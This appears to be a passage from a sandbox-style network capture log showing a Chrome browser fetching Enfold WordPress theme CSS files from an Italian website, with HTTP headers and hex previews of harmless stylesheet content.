                                                                                                                                              2025-01-03 16:32:48 UTC3911INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 50 6f 73 74 20 53 6c 69 64 65 72 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Post Slider=========================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              7192.168.2.164972189.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:49 UTC632OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttons/buttons.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:49 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:49 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 4709
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:49 UTC4709INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 42 75 74 74 6f 6e 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Button==============================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              8192.168.2.164972289.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:49 UTC636OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttonrow/buttonrow.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:49 UTC291INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:49 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 472
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:49 UTC472INData Raw: 2e 61 76 69 61 2d 62 75 74 74 6f 6e 72 6f 77 2d 77 72 61 70 20 3e 20 2e 61 76 69 61 2d 62 75 74 74 6f 6e 7b 0a 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 6f 74 74 6f 6d 3b 0a 7d 0a 0a 2e 61 76 69 61 2d 62 75 74 74 6f 6e 72 6f 77 2d 6c 65 66 74 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 7d 0a 0a 2e 61 76 69 61 2d 62 75 74 74 6f 6e 72 6f 77 2d 72 69 67 68 74 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 0a 2e 61 76 69 61 2d 62 75 74 74 6f 6e 72 6f 77 2d 63 65 6e 74 65 72 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 61 76 69 61 2d 62 75 74 74 6f 6e 72 6f 77 2d 72 69 67 68 74 20 2e 61 76 69 61 2d 62 75 74 74 6f 6e 3a 66 69 72 73 74
                                                                                                                                              Data Ascii: .avia-buttonrow-wrap > .avia-button{ vertical-align: bottom;}.avia-buttonrow-left{ text-align: left;}.avia-buttonrow-right{ text-align: right;}.avia-buttonrow-center{ text-align: center;}.avia-buttonrow-right .avia-button:first


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              9192.168.2.164972389.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:49 UTC652OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttons_fullwidth/buttons_fullwidth.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:49 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:49 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 1478
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:49 UTC1478INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 46 75 6c 6c 77 69 64 74 68 20 42 75 74 74 6f 6e 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Fullwidth Button====================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              10192.168.2.164972489.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:49 UTC636OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/catalogue/catalogue.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:49 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:49 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 1432
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:49 UTC1432INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 43 61 74 61 6c 6f 67 75 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Catalogue===========================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              11192.168.2.164972589.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:49 UTC634OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/comments/comments.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:49 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:49 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 5508
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:49 UTC5508INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 23 43 6f 6d 6d 65 6e 74 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================#Comment============================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              12192.168.2.164972689.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:49 UTC632OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contact/contact.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:49 UTC293INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:49 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 10401
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:49 UTC10401INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 43 6f 6e 74 61 63 74 20 46 6f 72 6d 20 64 65 66 61 75 6c 74 73 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Contact Form defaults===============================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              13192.168.2.164973089.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:50 UTC636OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:50 UTC293INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:50 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 11896
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:50 UTC11896INData Raw: 0a 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 53 6c 69 64 65 73 68 6f 77 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Slideshow==========================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              14192.168.2.164973189.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:50 UTC644OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contentslider/contentslider.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:50 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:50 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 2717
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:50 UTC2717INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 50 61 72 74 6e 65 72 2f 4c 6f 67 6f 20 53 6c 69 64 65 72 20 2b 20 43 6f 6e 74 65 6e 74 20 53 6c 69 64 65 72 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Partner/Logo Slider + Content Slider================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              15192.168.2.164973489.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
